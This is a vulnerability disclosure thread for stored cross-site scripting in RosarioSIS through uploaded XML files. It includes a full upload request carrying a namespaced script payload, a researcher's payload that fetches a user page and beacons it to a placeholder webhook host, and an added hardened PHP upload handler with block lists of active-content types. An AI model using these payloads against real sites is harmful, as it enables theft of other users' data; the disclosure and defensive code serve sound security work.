Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022


Description

When a user uploads a file whose extension is on the whitelist (XML is included), the server stores it under assets/PortalNotesFiles/. The stored file is then reachable by direct URL in the application's origin, so a crafted XML document carrying an XHTML-namespaced script element executes JavaScript in the victim's browser.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png

<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC images: screenshots not reproduced here.

Impact

This vulnerability lets an attacker execute arbitrary JavaScript in the application's origin, for example to read and exfiltrate other users' information or to issue authenticated requests from the victim's browser.
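As an added example (not RosarioSIS code and not the project's fix commit), these are the server-side controls that would have stopped this report's PoC: refuse extensions a browser renders as active content regardless of the Content-Type the client claims, sniff the real file type, store uploads outside the web root, and hand them back only through a download endpoint that forces an attachment disposition and nosniff. The directory layout, constant names and function names are this example's own assumptions.

```php
<?php
// Added example, not RosarioSIS code: a hardened attachment flow for a
// "upload, then link to the file directly" feature such as PortalNotes.
// Control 1: never accept extensions a browser will parse as a document that
//            may run script (xml, svg, html, ...), whatever Content-Type the
//            multipart part claims (the PoC sent aaa.xml as image/png).
// Control 2: store uploads outside the document root and serve them through a
//            download endpoint, so even a mis-classified file is never rendered
//            inline in the application's origin.

declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/../private_uploads'; // assumed: outside the web root

// Extensions that are safe to return to a browser as a download.
const ALLOWED_EXT = ['pdf', 'png', 'jpg', 'jpeg', 'gif', 'txt', 'csv', 'docx', 'xlsx', 'odt', 'ods', 'zip'];

// Extensions a browser treats as markup/script when opened directly.
// Checked first, so they stay blocked even if someone adds them to ALLOWED_EXT.
const ACTIVE_CONTENT_EXT = ['html', 'htm', 'xhtml', 'xml', 'svg', 'xsl', 'xslt', 'js', 'mjs', 'php', 'phtml', 'phar'];

// MIME types (from the file bytes, not the client header) that mean "renderable markup or script".
const ACTIVE_CONTENT_MIME = ['text/html', 'application/xhtml+xml', 'text/xml', 'application/xml',
                             'image/svg+xml', 'text/javascript', 'application/javascript'];

function upload_extension(string $filename): string {
    // pathinfo() uses the last dot, so "notes.pdf.xml" is treated as .xml; compare lower-cased.
    return strtolower(pathinfo($filename, PATHINFO_EXTENSION));
}

/**
 * Returns null if the upload may be stored, otherwise a human-readable reason.
 * $tmp_path is the server-side temp file ($_FILES[...]['tmp_name']);
 * the client-supplied Content-Type is deliberately never consulted.
 */
function reject_reason(string $original_name, string $tmp_path): ?string {
    $ext = upload_extension($original_name);
    if ($ext === '' || in_array($ext, ACTIVE_CONTENT_EXT, true)) {
        return "extension .$ext may be rendered as active content";
    }
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return "extension .$ext is not in the whitelist";
    }
    // Sniff the real content: an "image" whose bytes are <html>...<script> is rejected here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path) ?: 'application/octet-stream';
    if (in_array($mime, ACTIVE_CONTENT_MIME, true)) {
        return "file content is $mime, not a .$ext";
    }
    return null;
}

/** Stores an accepted upload under a random, server-chosen name and returns that id. */
function store_upload(string $original_name, string $tmp_path): string {
    $reason = reject_reason($original_name, $tmp_path);
    if ($reason !== null) {
        throw new RuntimeException("upload rejected: $reason");
    }
    $id = bin2hex(random_bytes(16)) . '.' . upload_extension($original_name);
    if (!move_uploaded_file($tmp_path, UPLOAD_DIR . '/' . $id)) {
        throw new RuntimeException('could not move upload into private storage');
    }
    return $id;
}

/** Response headers for a stored file: always a download, never sniffed, never scripted. */
function download_headers(string $display_name): array {
    $safe_name = preg_replace('/[^A-Za-z0-9._-]/', '_', $display_name);
    return [
        'Content-Type'            => 'application/octet-stream',
        'Content-Disposition'     => 'attachment; filename="' . $safe_name . '"',
        'X-Content-Type-Options'  => 'nosniff',
        'Content-Security-Policy' => "default-src 'none'; sandbox",
    ];
}

function serve_download(string $id, string $display_name): void {
    // Only server-generated ids (32 hex chars + extension) are accepted: no traversal, no guessing.
    if (!preg_match('/^[a-f0-9]{32}\.[a-z0-9]+$/', $id)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $id;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    foreach (download_headers($display_name) as $name => $value) {
        header("$name: $value");
    }
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}
```

From an upload handler this is called as store_upload($_FILES['FILE_ATTACHED_FILE']['name'], $_FILES['FILE_ATTACHED_FILE']['tmp_name']). The report's first PoC (aaa.xml sent with Content-Type: image/png) is refused at the extension check before its bytes are examined; the same markup renamed to aaa.png is refused when libmagic classifies it as text/html or XML. Anything that does get stored is only ever returned with an attachment disposition, so the browser never parses it as a document in the application's origin.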

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
Nhien.IT modified the report
2 years ago
Nhien.IT
2 years ago

Researcher


Hi @admin, can you contact the maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago
Jamie Slome
2 years ago

Admin


@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍

Let me know if you have any further questions.

François
2 years ago

Maintainer


Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

François
2 years ago

Maintainer


Oh, cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT
2 years ago

Researcher


Hello @maintainer,

Because the XML file is uploaded to your website, under the same-origin policy the JavaScript code in the malicious XML can fetch other users' information and send it to the attacker's host; sometimes this vulnerability also lets the attacker perform HTTP requests in the victim's browser.

Sample payload

<html>
    <head></head>
    <body>
        <!-- the file is parsed as XML, so the script element must be in the XHTML
             namespace to execute; a <script> wrapped only in CDATA is plain text.
             The JavaScript body is kept in CDATA so the "<my-webhook>" placeholder
             does not break XML well-formedness. -->
        <a:script xmlns:a="http://www.w3.org/1999/xhtml"><![CDATA[
fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))
        ]]></a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC: screenshot not reproduced here.

François Jacquet validated this vulnerability 2 years ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet marked this as fixed in 8.9.5 with commit 90842c 2 years ago
François Jacquet has been awarded the fix bounty
This vulnerability will not receive a CVE
FileUpload.fnc.php#L842 has been validated